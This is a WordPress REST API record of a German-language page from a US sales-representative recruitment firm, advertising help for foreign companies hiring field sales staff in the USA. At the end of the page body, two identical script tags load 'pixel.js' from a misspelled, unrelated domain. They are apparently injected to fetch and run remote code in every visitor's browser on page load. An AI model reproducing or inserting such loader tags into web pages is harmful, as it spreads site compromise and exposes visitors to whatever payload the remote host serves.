{"id":3150,"date":"2014-08-16T07:17:35","date_gmt":"2014-08-16T07:17:35","guid":{"rendered":"https:\/\/americanagent.com\/sales-representative-search-2\/"},"modified":"2014-09-17T12:14:21","modified_gmt":"2014-09-17T16:14:21","slug":"mitarbeiter-im-aussendienst","status":"publish","type":"page","link":"https:\/\/americanagent.com\/de\/mitarbeiter-im-aussendienst\/","title":{"rendered":"Mitarbeiter im Au\u00dfendienst"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-f4070011e4fcd3f95a7ac7ca6385ad8d\">\n#top .av-special-heading.av-av_heading-f4070011e4fcd3f95a7ac7ca6385ad8d{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-f4070011e4fcd3f95a7ac7ca6385ad8d .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-f4070011e4fcd3f95a7ac7ca6385ad8d .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-f4070011e4fcd3f95a7ac7ca6385ad8d av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Suchen Sie nach einem Mitarbeiter im Au\u00dfendienst?<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-aaf3a53f7e22769a7798f31e42769683 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>Einen vertrauensw\u00fcrdigen Au\u00dfendienstmitarbeiter mit Industrieerfahrung anzustellen kann eine der effektivsten Arten sein um in den amerikanischen Absatzmarkt vorzudringen.<br \/>\nManchmal erfordert die Situation unserer Klienten die sofortige Anstellung eines Mitarbeiters im Au\u00dfendienst.<\/p>\n<p>Wie jeder amerikanische Personalvermittler, sind wir in der Lage Au\u00dfendienstmitarbeiter oder \u201cExperten-vom-Fach\u201d, in jeder Industriebranche, von jedem Level an Erfahrung und in jeder Gegend der USA, anzuwerben. Wir benutzen zwar die selben Quellen, jedoch k\u00f6nnen wir eine viel mehr wirtschaftlich orientierte L\u00f6sung bieten und Ihre internationale Positionierung und Probleme besser verstehen als andere amerikanische Firmen.<\/p>\n<p>Wir haben schon vielen Unternehmen zu den besten Mitarbeitern f\u00fcr den Au\u00dfendienst verholfen und sind mit dem Prozess sehr vertraut. Wir k\u00f6nnen professionelle Verk\u00e4ufer und Vertreter ausfindig machen die Ihrem Unternehmen 100% ergeben sind.<\/p>\n<p>Amerikanische Handelsvertreter k\u00f6nnen sehr vorsichtig beim Umgang mit Firmen aus \u00dcbersee sein. Manchmal verlieren die besten Kandidaten w\u00e4hrend den finalen Verhandlungen, nur weil ihre berechtigten Bedenken nicht klar und deutlich von\u00a0der anwerbenden Partei verstanden werden. Wir k\u00f6nnen Ihnen verhelfen diese Aspekte besser zu verstehen. Zum Beispiel, kann es f\u00fcr eine nicht-amerikanische Firma schwierig sein standartisierte amerikanische Sozialleistungen f\u00fcr ihre Mitarbeiter wie Krankenversicherung und Pensionsf\u00fcrsorge zu verstehen. Es ist uns m\u00f6glich ihnen diese Themen zu erkl\u00e4ren w\u00e4hrend wir Ihnen helfen mit ihrem potenziellen Vertriebspartner auf die selbe Kopfh\u00f6he zu kommen.<\/p>\n<p>Wir genie\u00dfen es uns mit den amerikanischen Handelsvertretern auszutauschen, um Ihnen einzigartige Chancen und den amerikanischen Unternehmen einzigartige Produkte zu bieten. Wir wissen wie wir Sie am besten positionieren k\u00f6nnen und erl\u00e4utern die Vorteile einer unserer Handelsvertreter zu sein.<\/p>\n<p>Wenn die Anstellung eines amerikanischen Au\u00dfendienstmitarbeiters ihre gew\u00e4hlte Verkaufsstrategie ist, treten Sie mit uns in Kontakt und wir k\u00f6nnen Ihnen den typischen Zeitlichen Verlauf sowie die einzelnen Schritte erkl\u00e4ren.<\/p>\n<p>Diese Projekte k\u00f6nnen in Dauer und Ausma\u00df variieren, abh\u00e4ngig von der Anzahl an Handelsvertretern die Sie ben\u00f6tigen und ob nur eine Gegend oder mehrere Marktbereiche innerhalb der USA ber\u00fccksichtigt werden.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":3,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3150","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent - finden sie Mitarbeiter im Au\u00dfendienst<\/title>\n<meta name=\"description\" content=\"Ein Mitarbeiter im Au\u00dfendienst mit Industrieerfahrung anzustellen kann eine der effektivsten Arten sein um in den amerikanischen Absatzmarkt vorzudringen.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/de\/mitarbeiter-im-aussendienst\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent - finden sie Mitarbeiter im Au\u00dfendienst\" \/>\n<meta property=\"og:description\" content=\"Ein Mitarbeiter im Au\u00dfendienst mit Industrieerfahrung anzustellen kann eine der effektivsten Arten sein um in den amerikanischen Absatzmarkt vorzudringen.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/de\/mitarbeiter-im-aussendienst\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-17T16:14:21+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/mitarbeiter-im-aussendienst\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/de\\\/mitarbeiter-im-aussendienst\\\/\",\"name\":\"American Agent - finden sie Mitarbeiter im Au\u00dfendienst\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:35+00:00\",\"dateModified\":\"2014-09-17T16:14:21+00:00\",\"description\":\"Ein Mitarbeiter im Au\u00dfendienst mit Industrieerfahrung anzustellen kann eine der effektivsten Arten sein um in den amerikanischen Absatzmarkt vorzudringen.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/mitarbeiter-im-aussendienst\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/de\\\/mitarbeiter-im-aussendienst\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/mitarbeiter-im-aussendienst\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Mitarbeiter im Au\u00dfendienst\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/de\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent - finden sie Mitarbeiter im Au\u00dfendienst","description":"Ein Mitarbeiter im Au\u00dfendienst mit Industrieerfahrung anzustellen kann eine der effektivsten Arten sein um in den amerikanischen Absatzmarkt vorzudringen.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/de\/mitarbeiter-im-aussendienst\/","og_locale":"de_DE","og_type":"article","og_title":"American Agent - finden sie Mitarbeiter im Au\u00dfendienst","og_description":"Ein Mitarbeiter im Au\u00dfendienst mit Industrieerfahrung anzustellen kann eine der effektivsten Arten sein um in den amerikanischen Absatzmarkt vorzudringen.","og_url":"https:\/\/americanagent.com\/de\/mitarbeiter-im-aussendienst\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-17T16:14:21+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/de\/mitarbeiter-im-aussendienst\/","url":"https:\/\/americanagent.com\/de\/mitarbeiter-im-aussendienst\/","name":"American Agent - finden sie Mitarbeiter im Au\u00dfendienst","isPartOf":{"@id":"https:\/\/americanagent.com\/de\/#website"},"datePublished":"2014-08-16T07:17:35+00:00","dateModified":"2014-09-17T16:14:21+00:00","description":"Ein Mitarbeiter im Au\u00dfendienst mit Industrieerfahrung anzustellen kann eine der effektivsten Arten sein um in den amerikanischen Absatzmarkt vorzudringen.","breadcrumb":{"@id":"https:\/\/americanagent.com\/de\/mitarbeiter-im-aussendienst\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/de\/mitarbeiter-im-aussendienst\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/de\/mitarbeiter-im-aussendienst\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/de\/"},{"@type":"ListItem","position":2,"name":"Mitarbeiter im Au\u00dfendienst"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/de\/#website","url":"https:\/\/americanagent.com\/de\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages\/3150","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/comments?post=3150"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/pages\/3150\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/de\/wp-json\/wp\/v2\/media?parent=3150"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}